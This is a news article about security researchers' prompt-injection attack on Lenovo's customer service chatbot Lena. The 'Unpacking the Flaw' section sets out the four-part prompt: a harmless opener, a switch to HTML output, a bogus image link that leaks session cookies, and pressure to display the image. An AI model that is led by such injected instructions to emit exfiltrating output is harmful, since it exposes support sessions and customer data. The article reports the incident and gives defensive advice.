Lenovo’s Customer Service AI Chatbot Got Tricked Into Revealing Sensitive Information. Here’s How.

A single 400-character prompt exposed an almighty flaw in Lenovo’s AI assistant

4
Lenovo’s Customer Service AI Chatbot Got Tricked Into Revealing Sensitive Information. Here's How.
Contact CenterConversational AILatest News

Published: August 20, 2025

Rhys Fisher

Lenovo is the latest high-profile brand to have a security flaw exposed in its AI customer service chatbot.

Indeed, Security Researchers at Cybernews opened up Lenovo’s ChatGPT-powered customer service assistant, Lena, with jaw-dropping results.

Its investigation found that Lena can be tricked into providing sensitive company information and data.

Cybernews researchers were able to uncover a flaw that allowed them to hijack live session cookies from customer support agents.

With a stolen support agent cookie, an attacker could slip into the support system without any login details, access live chats, and potentially dig through past conversations and data.

And all it took was a single, 400-character prompt.

In discussing the investigation, the Cybernews researchers highlighted the relative ease with which AI chatbots can be duped:

Everyone knows chatbots hallucinate and can be tricked by prompt injections. This isn’t new.

“What’s truly surprising is that Lenovo, despite being aware of these flaws, did not protect itself from potentially malicious user manipulations and chatbot outputs.”

The news comes soon after CX Today reported on how a different team of researchers cracked open a replica of McKinsey & Co.’s customer service bot, getting it to spit out entire CRM records.

Unpacking the Flaw

First of all, it should be noted that while Cybernews did uncover a flaw in Lenovo’s system, there is nothing to suggest that bad actors have accessed any customer data or information.

Cybernews reported the flaw to Lenovo, which confirmed the issue and moved quickly to secure its systems.

But how exactly were the Cybernews researchers able to dupe Lena?

The researchers have revealed that the prompt used contained the following four key elements:

  • Innocent opener: The attack begins with a straightforward product query, like asking for the specs of a Lenovo IdeaPad.
  • Hidden format switch: The prompt then nudges the bot into answering in HTML (alongside JSON and plain text), a format the server is primed to act on.
  • The payload: Buried in the HTML is a bogus image link that, when it fails to load, pushes the browser to contact an attacker’s server and leak session cookies.
  • The push: To seal it, the prompt insists the bot must show the image, framing it as vital to the user’s decision-making.

Worryingly, Zenity revealed earlier this month that 3,500 public-facing agents remain open to similar prompt injection attacks.

How to Prevent Your Chatbot from Becoming a Liability

Lenovo’s Lena case is a wake-up call for any company leaning on AI for customer support.

The core problem isn’t just a single flawed implementation; chatbots, by design, are eager to please. And when that eagerness meets poorly vetted inputs, things can go sideways fast.

Indeed, Lenovo is far from the first major organization to experience chatbot troubles.

The challenges aren’t limited to security flaws. AI chatbots have a long history of hallucinating and/or giving wrong or misleading advice.

Take New York City’s “MyCity” small-business assistant as an example. In April 2024, it misrepresented city policies and even suggested illegal actions to users.

Similarly, Air Canada recently found itself in court over its chatbot’s inaccurate guidance, with judges ruling the airline had to honor advice that was plain wrong.

Other errors have verged on the absurd. For instance, DPD’s GenAI chatbot was coaxed into swearing and composing a self-deprecating poem about the company.

These incidents underline just how unreliable chatbots can be.

For businesses, the question isn’t if an AI will make mistakes; it’s how prepared you are to contain them when they do make a mistake.

While the ever-evolving nature of AI-powered technology makes it impossible to put together a definitive guide on how businesses can prevent chatbot errors, the following steps will go a long way towards shoring up your defenses:

  • Harden input and output checks: Never trust what comes in or goes out. Sanitize all user inputs and chatbot responses, and block execution of unverified code. It’s a simple step that could have prevented the session-cookie flaw in Lena.
  • Verify AI outputs before acting on them: Web servers shouldn’t automatically treat chatbot outputs as actionable instructions. As is evident, blind trust can open the door to attacks.
  • Limit session privileges: Not every bot interaction needs full agent-level access. Segregating privileges reduces the impact if a token or cookie is compromised.
  • Monitor for anomalies: Keep an eye on unusual access patterns or unexpected requests. Early detection is often the only thing stopping small flaws from becoming major breaches.
  • Test aggressively and continuously: Regularly simulate prompt-injection attacks or other AI-specific exploits. Proactive testing beats reactive firefighting every time.

Ultimately, while chatbots can boost efficiency and CX, they can only truly be relied upon if businesses pair them with strong security hygiene.

As all of the above examples have demonstrated, even big brands can overlook the basics – and in the world of AI, small oversights can escalate fast.

 

 

Artificial IntelligenceAutomationCCaaSChatGPTFraudSecurity and Compliance

Brands mentioned in this article.

Featured

Share This Post